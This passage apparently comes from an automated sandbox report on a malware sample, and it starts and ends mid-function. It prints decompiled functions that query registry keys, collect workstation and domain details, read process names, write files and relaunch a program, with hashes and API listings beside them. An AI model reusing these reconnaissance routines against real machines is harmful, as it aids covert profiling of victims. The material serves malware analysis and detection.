							 *0x432858( *(_t109 - 0x80c));
							 *0x432858( *(_t109 - 0x810));
							_t53 = _t109 - 0x31958;
						}
					}
					L15:
					return E00404354(_t53, _t78,  *(_t109 - 8) ^ _t109, _t96, _t107, _t108);
					L16:
				}
				L14:
				_t96 =  *(_t109 - 0x810);
				 *0x432858( *(_t109 - 0x810));
				_t53 = _t109 - 0x31958;
				goto L15;
			}












                                                                                                                              0x0041ad33
                                                                                                                              0x0041ad33
                                                                                                                              0x0041ad33
                                                                                                                              0x0041ad3c
                                                                                                                              0x0041ad49
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ad4f
                                                                                                                              0x0041ad4f
                                                                                                                              0x0041ad7d
                                                                                                                              0x0041ad83
                                                                                                                              0x0041ad90
                                                                                                                              0x0041af23
                                                                                                                              0x00000000
                                                                                                                              0x0041ad96
                                                                                                                              0x0041ad96
                                                                                                                              0x0041adb0
                                                                                                                              0x0041add3
                                                                                                                              0x0041addb
                                                                                                                              0x0041ae02
                                                                                                                              0x0041ae02
                                                                                                                              0x0041ae2e
                                                                                                                              0x0041ae36
                                                                                                                              0x0041ae3c
                                                                                                                              0x0041ae42
                                                                                                                              0x0041ae51
                                                                                                                              0x0041ae57
                                                                                                                              0x0041ae57
                                                                                                                              0x0041ae5f
                                                                                                                              0x0041ae65
                                                                                                                              0x0041ae6c
                                                                                                                              0x0041ae81
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041ae94
                                                                                                                              0x0041aea2
                                                                                                                              0x0041aea8
                                                                                                                              0x0041aed4
                                                                                                                              0x0041aedc
                                                                                                                              0x0041aeea
                                                                                                                              0x0041aefe
                                                                                                                              0x0041aefe
                                                                                                                              0x0041af04
                                                                                                                              0x0041af10
                                                                                                                              0x0041af10
                                                                                                                              0x0041ae8e
                                                                                                                              0x0041af16
                                                                                                                              0x0041af1d
                                                                                                                              0x00000000
                                                                                                                              0x0041addd
                                                                                                                              0x0041addd
                                                                                                                              0x0041addd
                                                                                                                              0x0041ade4
                                                                                                                              0x0041adf1
                                                                                                                              0x0041adf7
                                                                                                                              0x0041adf7
                                                                                                                              0x0041addb
                                                                                                                              0x0041af3b
                                                                                                                              0x0041af48
                                                                                                                              0x00000000
                                                                                                                              0x0041af48
                                                                                                                              0x0041af28
                                                                                                                              0x0041af28
                                                                                                                              0x0041af2f
                                                                                                                              0x0041af35
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,?,?,00000400,00000000,00000000,00000000,00000000), ref: 0041AD7D
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0041ADD3
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,000F003F,?,00000400), ref: 0041AE2E
                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,000F003F,?,00000400), ref: 0041AED4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValue$EnumOpen
                                                                                                                              • String ID: %s\%s
                                                                                                                              • API String ID: 847047915-4073750446
                                                                                                                              • Opcode ID: 7e3b1e9eaef633de3c84d7d642d6c35276b624b8e4ffca11b8f592e78514d2a3
                                                                                                                              • Instruction ID: f3428a77bd91617219cae783505e27cb4c8bfcd2f017827be334a9b1ae9db7bc
                                                                                                                              • Opcode Fuzzy Hash: 7e3b1e9eaef633de3c84d7d642d6c35276b624b8e4ffca11b8f592e78514d2a3
                                                                                                                              • Instruction Fuzzy Hash: 66214DB490122C9BDB64DB50DC85BE9B3BCFF48304F0491EAA24966180DB745AC5CFA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B500, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E0041B500() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char* _t11;

				_v16 = 0x64;
				_v20 = 0;
				_v12 = 0;
				_t11 =  &_v20;
				__imp__NetWkstaGetInfo(_v12, _v16, _t11); // executed
				_v8 = _t11;
				if(_v8 != 0) {
					return "Unknown";
				}
				return E0041A160( *((intOrPtr*)(_v20 + 8)));
			}








                                                                                                                              0x0041b506
                                                                                                                              0x0041b50d
                                                                                                                              0x0041b514
                                                                                                                              0x0041b51b
                                                                                                                              0x0041b527
                                                                                                                              0x0041b52d
                                                                                                                              0x0041b534
                                                                                                                              0x00000000
                                                                                                                              0x0041b549
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • NetWkstaGetInfo.NETAPI32(00000000,00000064,00000000), ref: 0041B527
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoWksta
                                                                                                                              • String ID: Unknown$d
                                                                                                                              • API String ID: 30969799-3021344351
                                                                                                                              • Opcode ID: dab486e043888457c44b747f981cab89ced7394723cfab24a07cdd0821c44d13
                                                                                                                              • Instruction ID: 0cc9feaee1bb4248ef5061c996108ea8a110c275892f2931b12f92f325475970
                                                                                                                              • Opcode Fuzzy Hash: dab486e043888457c44b747f981cab89ced7394723cfab24a07cdd0821c44d13
                                                                                                                              • Instruction Fuzzy Hash: 19F058B4D0420CEBCB00DF94E845BEEBBB9EB08308F00859AE40597240D7799A55CB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B570, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E0041B570() {
				intOrPtr _v8;
				char _v280;
				char* _t8;

				_t8 =  &_v280;
				__imp__DsRoleGetPrimaryDomainInformation(0, 1, _t8); // executed
				_v8 = _t8;
				if(_v8 == 0) {
					if( *((intOrPtr*)(_v280 + 0xc)) != 0) {
						return E0041A160( *((intOrPtr*)(_v280 + 0xc)));
					}
					return "Unknown";
				}
				return "Unknown";
			}






                                                                                                                              0x0041b579
                                                                                                                              0x0041b584
                                                                                                                              0x0041b58a
                                                                                                                              0x0041b591
                                                                                                                              0x0041b5a4
                                                                                                                              0x00000000
                                                                                                                              0x0041b5be
                                                                                                                              0x00000000
                                                                                                                              0x0041b5a6
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?), ref: 0041B584
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DomainInformationPrimaryRole
                                                                                                                              • String ID: Unknown$Unknown
                                                                                                                              • API String ID: 2855586375-3288453820
                                                                                                                              • Opcode ID: 8bf194b5eb0fff4c22011f0aa6ca56092ce4aafcdf5e959ef6ee53560e78e9d5
                                                                                                                              • Instruction ID: 994e9e5a79c761b6cce28c5c30ff8c00c73be8f9ebb7f73b9366f8b68f0dda91
                                                                                                                              • Opcode Fuzzy Hash: 8bf194b5eb0fff4c22011f0aa6ca56092ce4aafcdf5e959ef6ee53560e78e9d5
                                                                                                                              • Instruction Fuzzy Hash: 1FF0A070A0410CEBEB10DB50E9067E5B77AEB04709F4082E6E90997380D3799D868BAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00417880, Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00417880(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v12;
				void* _t45;

				_v12 = __ecx;
				_v8 = 0;
				if(( *(_v12 + 0x2c) & 0x000000ff) == 0) {
					_t45 = E004176C0(_v12); // executed
					_v8 = _t45;
				}
				 *(_v12 + 0x2c) = 1;
				if( *(_v12 + 0x20) != 0 &&  *(_v12 + 0xc) != 0) {
					UnmapViewOfFile( *(_v12 + 0x20));
				}
				 *(_v12 + 0x20) = 0;
				if( *(_v12 + 0xc) != 0) {
					CloseHandle( *(_v12 + 0xc));
				}
				 *(_v12 + 0xc) = 0;
				if( *(_v12 + 4) != 0 && ( *(_v12 + 8) & 0x000000ff) != 0) {
					CloseHandle( *(_v12 + 4));
				}
				 *(_v12 + 4) = 0;
				 *(_v12 + 8) = 0;
				return _v8;
			}






                                                                                                                              0x00417886
                                                                                                                              0x00417889
                                                                                                                              0x00417899
                                                                                                                              0x0041789e
                                                                                                                              0x004178a3
                                                                                                                              0x004178a3
                                                                                                                              0x004178a9
                                                                                                                              0x004178b4
                                                                                                                              0x004178c6
                                                                                                                              0x004178c6
                                                                                                                              0x004178cf
                                                                                                                              0x004178dd
                                                                                                                              0x004178e6
                                                                                                                              0x004178e6
                                                                                                                              0x004178ef
                                                                                                                              0x004178fd
                                                                                                                              0x00417911
                                                                                                                              0x00417911
                                                                                                                              0x0041791a
                                                                                                                              0x00417924
                                                                                                                              0x0041792e

                                                                                                                              APIs
                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 004178C6
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004178E6
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00417911
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle$FileUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 260491571-0
                                                                                                                              • Opcode ID: 52af9201f7e8f3cf6b307c72bd33e491c912dbb0bb0b919b19dd72c1d6efd311
                                                                                                                              • Instruction ID: 11a27e91ac3b3ffdcce7ec8384e8c2b627b78d682cb19b9dd0d09749feb03add
                                                                                                                              • Opcode Fuzzy Hash: 52af9201f7e8f3cf6b307c72bd33e491c912dbb0bb0b919b19dd72c1d6efd311
                                                                                                                              • Instruction Fuzzy Hash: 8921E474A04208EFDB14DF94C498B9EBFB1BB48315F1882D9D8845B391C739EA89CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A720, Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 44%
                                                                                                                              			E0041A720(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				signed int _t10;
				void* _t16;
				void* _t22;
				signed int _t35;

				_t10 =  *0x4301f4; // 0xe687535
				_v8 = _t10 ^ _t35;
				E004091C0( &_v276, 0, 0x104);
				E004091C0( &_v540, 0, 0x104);
				_t16 = E0041A600( *0x432824(_a4)); // executed
				 *0x432768( &_v276,  *0x4322cc,  *0x432824(_t16));
				 *0x43285c( &_v540);
				_t22 = ShellExecuteA(0, 0,  *0x432634,  &_v276,  &_v540, 0); // executed
				return E00404354(_t22, __ebx, _v8 ^ _t35,  *0x432634, __edi, __esi, 0x104);
			}










                                                                                                                              0x0041a729
                                                                                                                              0x0041a730
                                                                                                                              0x0041a741
                                                                                                                              0x0041a757
                                                                                                                              0x0041a76a
                                                                                                                              0x0041a787
                                                                                                                              0x0041a79c
                                                                                                                              0x0041a7bd
                                                                                                                              0x0041a7d0

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 0041A741
                                                                                                                              • _memset.LIBCMT ref: 0041A757
                                                                                                                                • Part of subcall function 0041A600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041A63F
                                                                                                                              • ShellExecuteA.SHELL32(00000000,00000000,?,?,?,00000000), ref: 0041A7BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$ExecuteFileModuleNameShell
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1203448310-0
                                                                                                                              • Opcode ID: baf83078a686ac06e6fc9f2a6dcaae8c194dc191c1c4b6f6066e0c50a55cede3
                                                                                                                              • Instruction ID: d69d9e76eef0e66095736d82ead0aa8f23bf222a92cc1a2a572ef11dcdc1f2d9
                                                                                                                              • Opcode Fuzzy Hash: baf83078a686ac06e6fc9f2a6dcaae8c194dc191c1c4b6f6066e0c50a55cede3
                                                                                                                              • Instruction Fuzzy Hash: BD11CCF1940208ABD708EBA0DD8AFDA737CAB5C704F0002A8B705961D1DEB49A84CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421440, Relevance: 4.5, APIs: 3, Instructions: 46fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00421440(intOrPtr __ecx, CHAR* _a4) {
				long _v8;
				void* _v12;
				intOrPtr _v16;
				void* _t19;

				_v16 = __ecx;
				if( *(_v16 + 0x28) == 0 ||  *(_v16 + 0x34) == 0) {
					return 0;
				} else {
					_t19 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0x80, 0); // executed
					_v12 = _t19;
					if(_v12 != 0xffffffff) {
						_v8 = 0;
						WriteFile(_v12,  *(_v16 + 0x28),  *(_v16 + 0x34),  &_v8, 0); // executed
						CloseHandle(_v12);
						return 1;
					}
					return 0;
				}
			}







                                                                                                                              0x00421446
                                                                                                                              0x00421450
                                                                                                                              0x00000000
                                                                                                                              0x0042145f
                                                                                                                              0x00421475
                                                                                                                              0x0042147b
                                                                                                                              0x00421482
                                                                                                                              0x00421488
                                                                                                                              0x004214a7
                                                                                                                              0x004214b1
                                                                                                                              0x00000000
                                                                                                                              0x004214b7
                                                                                                                              0x00000000
                                                                                                                              0x00421484

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,0E687535), ref: 00421475
                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 004214A7
                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004214B1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1065093856-0
                                                                                                                              • Opcode ID: 06d5e509e48cf5e6f34cfc1713bf35c5c0cec532718b5c270ec26c1f8e4708b8
                                                                                                                              • Instruction ID: 7395c4af1837315ae9011a525f06c5fc82e1a22bec7eb91195f490e5e8424017
                                                                                                                              • Opcode Fuzzy Hash: 06d5e509e48cf5e6f34cfc1713bf35c5c0cec532718b5c270ec26c1f8e4708b8
                                                                                                                              • Instruction Fuzzy Hash: 4A118074B00208FFD720DFA4DC85F9EB775AB58310F6086A9EA15A73D0C374AA46DB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00421440, Relevance: 4.5, APIs: 3, Instructions: 46fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00421440(intOrPtr __ecx, CHAR* _a4) {
				long _v8;
				void* _v12;
				intOrPtr _v16;
				void* _t19;

				_v16 = __ecx;
				if( *(_v16 + 0x28) == 0 ||  *(_v16 + 0x34) == 0) {
					return 0;
				} else {
					_t19 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0x80, 0); // executed
					_v12 = _t19;
					if(_v12 != 0xffffffff) {
						_v8 = 0;
						WriteFile(_v12,  *(_v16 + 0x28),  *(_v16 + 0x34),  &_v8, 0); // executed
						CloseHandle(_v12);
						return 1;
					}
					return 0;
				}
			}







                                                                                                                              0x00421446
                                                                                                                              0x00421450
                                                                                                                              0x00000000
                                                                                                                              0x0042145f
                                                                                                                              0x00421475
                                                                                                                              0x0042147b
                                                                                                                              0x00421482
                                                                                                                              0x00421488
                                                                                                                              0x004214a7
                                                                                                                              0x004214b1
                                                                                                                              0x00000000
                                                                                                                              0x004214b7
                                                                                                                              0x00000000
                                                                                                                              0x00421484

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,0E687535), ref: 00421475
                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 004214A7
                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 004214B1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1065093856-0
                                                                                                                              • Opcode ID: 06d5e509e48cf5e6f34cfc1713bf35c5c0cec532718b5c270ec26c1f8e4708b8
                                                                                                                              • Instruction ID: 7395c4af1837315ae9011a525f06c5fc82e1a22bec7eb91195f490e5e8424017
                                                                                                                              • Opcode Fuzzy Hash: 06d5e509e48cf5e6f34cfc1713bf35c5c0cec532718b5c270ec26c1f8e4708b8
                                                                                                                              • Instruction Fuzzy Hash: 4A118074B00208FFD720DFA4DC85F9EB775AB58310F6086A9EA15A73D0C374AA46DB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B0E0, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0041B0E0() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0xe687535
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0x432594; // 0x2337060
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0x432224; // 0x2336c20
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}















                                                                                                                              0x0041b0e9
                                                                                                                              0x0041b0f0
                                                                                                                              0x0041b0f3
                                                                                                                              0x0041b105
                                                                                                                              0x0041b111
                                                                                                                              0x0041b119
                                                                                                                              0x0041b12a
                                                                                                                              0x0041b131
                                                                                                                              0x0041b135
                                                                                                                              0x0041b135
                                                                                                                              0x0041b13f
                                                                                                                              0x0041b158

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,02337060,00000000,00020119,?), ref: 0041B111
                                                                                                                              • RegQueryValueExA.KERNEL32(?,02336C20,00000000,00000000,?,000000FF), ref: 0041B135
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041B13F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 9854777b51662a1b4163059b4eb2929d234a9bfc70f81d67747477c2dc7c09a1
                                                                                                                              • Instruction ID: e9006c33b1f3d5608eeeefafc4b86fdc27a5baa45399712a1b3837a38b7680d1
                                                                                                                              • Opcode Fuzzy Hash: 9854777b51662a1b4163059b4eb2929d234a9bfc70f81d67747477c2dc7c09a1
                                                                                                                              • Instruction Fuzzy Hash: F0018175A0020DBFDB08DF94ED56FEEB3B8EB48700F0041A9A605A7280EB746A44CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B260, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0041B260() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0xe687535
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0x4323d8; // 0x2337028
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0x432480; // 0x2336bc0
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}















                                                                                                                              0x0041b269
                                                                                                                              0x0041b270
                                                                                                                              0x0041b273
                                                                                                                              0x0041b285
                                                                                                                              0x0041b291
                                                                                                                              0x0041b299
                                                                                                                              0x0041b2aa
                                                                                                                              0x0041b2b1
                                                                                                                              0x0041b2b5
                                                                                                                              0x0041b2b5
                                                                                                                              0x0041b2bf
                                                                                                                              0x0041b2d8

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,02337028,00000000,00020119,?), ref: 0041B291
                                                                                                                              • RegQueryValueExA.KERNEL32(?,02336BC0,00000000,00000000,?,000000FF), ref: 0041B2B5
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041B2BF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 1cf1f1c1e2cc4bbd7f63910e5a42fc97cd9555917660760b7f8267a608a4c158
                                                                                                                              • Instruction ID: 6be965c5c923288808e501c7c14758c08100337a4ead401ed5fa8a82468b7490
                                                                                                                              • Opcode Fuzzy Hash: 1cf1f1c1e2cc4bbd7f63910e5a42fc97cd9555917660760b7f8267a608a4c158
                                                                                                                              • Instruction Fuzzy Hash: 42016275A0020DBFDB04DB94DD46FEEB3B8EB48700F1041A9A605A7280DA746A448B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041B460, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0041B460() {
				void* _v8;
				int _v12;
				signed int _v16;
				char _v284;
				signed int _t10;
				long _t13;
				intOrPtr _t20;
				char* _t21;
				char* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t10 =  *0x4301f4; // 0xe687535
				_v16 = _t10 ^ _t29;
				_v12 = 0xff;
				_t21 =  *0x4321e0; // 0x2336fe8
				_t13 = RegOpenKeyExA(0x80000002, _t21, 0, 0x20119,  &_v8); // executed
				if(_t13 == 0) {
					_t24 =  *0x432574; // 0x2336110
					_t25 = _v8;
					RegQueryValueExA(_v8, _t24, 0, 0,  &_v284,  &_v12); // executed
				}
				RegCloseKey(_v8);
				return E00404354( &_v284, _t20, _v16 ^ _t29, _t25, _t27, _t28);
			}















                                                                                                                              0x0041b469
                                                                                                                              0x0041b470
                                                                                                                              0x0041b473
                                                                                                                              0x0041b485
                                                                                                                              0x0041b491
                                                                                                                              0x0041b499
                                                                                                                              0x0041b4aa
                                                                                                                              0x0041b4b1
                                                                                                                              0x0041b4b5
                                                                                                                              0x0041b4b5
                                                                                                                              0x0041b4bf
                                                                                                                              0x0041b4d8

                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,02336FE8,00000000,00020119,?), ref: 0041B491
                                                                                                                              • RegQueryValueExA.KERNEL32(?,02336110,00000000,00000000,?,000000FF), ref: 0041B4B5
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041B4BF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 5543fc9e14794ebc2460d778d5a0a552370f5e5fa382d45e8362d85d34f91f06
                                                                                                                              • Instruction ID: 73bd3a17dc5699dde7e36c61eca224ba4d86d069b81c3616f5d6a749abcba002
                                                                                                                              • Opcode Fuzzy Hash: 5543fc9e14794ebc2460d778d5a0a552370f5e5fa382d45e8362d85d34f91f06
                                                                                                                              • Instruction Fuzzy Hash: D7018175A0020CBFDB08DFA4DD46FEEB3B8EB48700F0041ADE605A7280DB746A448F98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A600, Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 57%
                                                                                                                              			E0041A600(long _a4) {
				void* _v8;
				signed int _v12;
				char _v276;
				signed int _t10;
				intOrPtr _t19;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t10 =  *0x4301f4; // 0xe687535
				_v12 = _t10 ^ _t26;
				_v8 = OpenProcess(0x410, 0, _a4);
				if(_v8 != 0) {
					_t23 = _v8;
					 *0x4327f0(_v8, 0,  &_v276, 0x104); // executed
					CloseHandle(_v8);
				}
				return E00404354( &_v276, _t19, _v12 ^ _t26, _t23, _t24, _t25);
			}











                                                                                                                              0x0041a609
                                                                                                                              0x0041a610
                                                                                                                              0x0041a624
                                                                                                                              0x0041a62b
                                                                                                                              0x0041a63b
                                                                                                                              0x0041a63f
                                                                                                                              0x0041a649
                                                                                                                              0x0041a649
                                                                                                                              0x0041a662

                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041A61E
                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041A63F
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041A649
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3183270410-0
                                                                                                                              • Opcode ID: ec1565238759391ab5efba537afc77da55aa47769eb43047e291d2dab299360a
                                                                                                                              • Instruction ID: 1d1b37563283dd2e0880c91a50c3a5397273ca56bd8ac06d4b12f4a0aad7b886
                                                                                                                              • Opcode Fuzzy Hash: ec1565238759391ab5efba537afc77da55aa47769eb43047e291d2dab299360a
                                                                                                                              • Instruction Fuzzy Hash: D1F03074A0020CEFDB08EFA4DD4ABED77B4FB08704F1015A9EA1597290D6B46A84DB54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00415750, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00415750(signed int _a4, signed int _a8, signed short* _a12) {
				signed int _v8;
				signed char _v9;
				signed int _t97;
				signed int _t99;

				if(_a8 < 1 || _a8 > 8) {
					_v9 = 0;
				} else {
					_v9 = 1;
				}
				E004147B0(_a4, _v9 & 0x000000ff, "bad pack level");
				 *((intOrPtr*)(_a4 + 0x6af78)) = 0;
				if( *((intOrPtr*)(_a4 + 0x6af70)) == 0) {
					 *((intOrPtr*)(_a4 + 0x6af78)) = 1;
